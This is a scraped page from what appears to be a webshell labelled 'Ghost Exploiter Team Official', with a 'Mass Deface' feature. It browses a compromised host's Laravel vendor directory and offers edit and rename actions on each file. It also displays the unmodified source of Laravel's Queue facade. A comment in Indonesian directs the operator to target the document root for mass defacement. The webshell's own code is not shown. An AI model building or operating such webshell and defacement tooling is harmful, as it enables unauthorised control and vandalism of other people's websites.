webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Support
/
Facades
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
App.php
8.31KB
edt
ren
Artisan.php
1.527KB
edt
ren
Auth.php
4.969KB
edt
ren
Blade.php
2.89KB
edt
ren
Broadcast.php
2.283KB
edt
ren
Bus.php
4.722KB
edt
ren
Cache.php
3.754KB
edt
ren
Config.php
0.868KB
edt
ren
Cookie.php
2.392KB
edt
ren
Crypt.php
0.701KB
edt
ren
DB.php
7.467KB
edt
ren
Date.php
5.34KB
edt
ren
Event.php
4.695KB
edt
ren
Facade.php
8.754KB
edt
ren
File.php
3.802KB
edt
ren
Gate.php
2.733KB
edt
ren
Hash.php
1.352KB
edt
ren
Http.php
9KB
edt
ren
Lang.php
2.077KB
edt
ren
Log.php
2.673KB
edt
ren
Mail.php
4.847KB
edt
ren
Notification.php
3.76KB
edt
ren
ParallelTesting.php
1.223KB
edt
ren
Password.php
1.981KB
edt
ren
Pipeline.php
1.229KB
edt
ren
Process.php
4.035KB
edt
ren
Queue.php
4.608KB
edt
ren
RateLimiter.php
1.067KB
edt
ren
Redirect.php
2.299KB
edt
ren
Redis.php
1.99KB
edt
ren
Request.php
10.621KB
edt
ren
Response.php
2.736KB
edt
ren
Route.php
8.046KB
edt
ren
Schema.php
3.181KB
edt
ren
Session.php
3.521KB
edt
ren
Storage.php
7.498KB
edt
ren
URL.php
3.619KB
edt
ren
Validator.php
1.539KB
edt
ren
View.php
5.401KB
edt
ren
Vite.php
1.847KB
edt
ren
<?php namespace Illuminate\Support\Facades; use Illuminate\Queue\Worker; use Illuminate\Support\Testing\Fakes\QueueFake; /** * @method static void before(mixed $callback) * @method static void after(mixed $callback) * @method static void exceptionOccurred(mixed $callback) * @method static void looping(mixed $callback) * @method static void failing(mixed $callback) * @method static void stopping(mixed $callback) * @method static bool connected(string|null $name = null) * @method static \Illuminate\Contracts\Queue\Queue connection(string|null $name = null) * @method static void extend(string $driver, \Closure $resolver) * @method static void addConnector(string $driver, \Closure $resolver) * @method static string getDefaultDriver() * @method static void setDefaultDriver(string $name) * @method static string getName(string|null $connection = null) * @method static \Illuminate\Contracts\Foundation\Application getApplication() * @method static \Illuminate\Queue\QueueManager setApplication(\Illuminate\Contracts\Foundation\Application $app) * @method static int size(string|null $queue = null) * @method static mixed push(string|object $job, mixed $data = '', string|null $queue = null) * @method static mixed pushOn(string $queue, string|object $job, mixed $data = '') * @method static mixed pushRaw(string $payload, string|null $queue = null, array $options = []) * @method static mixed later(\DateTimeInterface|\DateInterval|int $delay, string|object $job, mixed $data = '', string|null $queue = null) * @method static mixed laterOn(string $queue, \DateTimeInterface|\DateInterval|int $delay, string|object $job, mixed $data = '') * @method static mixed bulk(array $jobs, mixed $data = '', string|null $queue = null) * @method static \Illuminate\Contracts\Queue\Job|null pop(string|null $queue = null) * @method static string getConnectionName() * @method static \Illuminate\Contracts\Queue\Queue setConnectionName(string $name) * @method static mixed getJobTries(mixed $job) * @method static mixed getJobBackoff(mixed $job) * @method static mixed getJobExpiration(mixed $job) * @method static void createPayloadUsing(callable|null $callback) * @method static \Illuminate\Container\Container getContainer() * @method static void setContainer(\Illuminate\Container\Container $container) * @method static \Illuminate\Support\Testing\Fakes\QueueFake except(array|string $jobsToBeQueued) * @method static void assertPushed(string|\Closure $job, callable|int|null $callback = null) * @method static void assertPushedOn(string $queue, string|\Closure $job, callable|null $callback = null) * @method static void assertPushedWithChain(string $job, array $expectedChain = [], callable|null $callback = null) * @method static void assertPushedWithoutChain(string $job, callable|null $callback = null) * @method static void assertClosurePushed(callable|int|null $callback = null) * @method static void assertClosureNotPushed(callable|null $callback = null) * @method static void assertNotPushed(string|\Closure $job, callable|null $callback = null) * @method static void assertCount(int $expectedCount) * @method static void assertNothingPushed() * @method static \Illuminate\Support\Collection pushed(string $job, callable|null $callback = null) * @method static bool hasPushed(string $job) * @method static bool shouldFakeJob(object $job) * @method static array pushedJobs() * @method static \Illuminate\Support\Testing\Fakes\QueueFake serializeAndRestore(bool $serializeAndRestore = true) * * @see \Illuminate\Queue\QueueManager * @see \Illuminate\Queue\Queue * @see \Illuminate\Support\Testing\Fakes\QueueFake */ class Queue extends Facade { /** * Register a callback to be executed to pick jobs. * * @param string $workerName * @param callable $callback * @return void */ public static function popUsing($workerName, $callback) { return Worker::popUsing($workerName, $callback); } /** * Replace the bound instance with a fake. * * @param array|string $jobsToFake * @return \Illuminate\Support\Testing\Fakes\QueueFake */ public static function fake($jobsToFake = []) { $actualQueueManager = static::isFake() ? static::getFacadeRoot()->queue : static::getFacadeRoot(); return tap(new QueueFake(static::getFacadeApplication(), $jobsToFake, $actualQueueManager), function ($fake) { static::swap($fake); }); } /** * Get the registered name of the component. * * @return string */ protected static function getFacadeAccessor() { return 'queue'; } }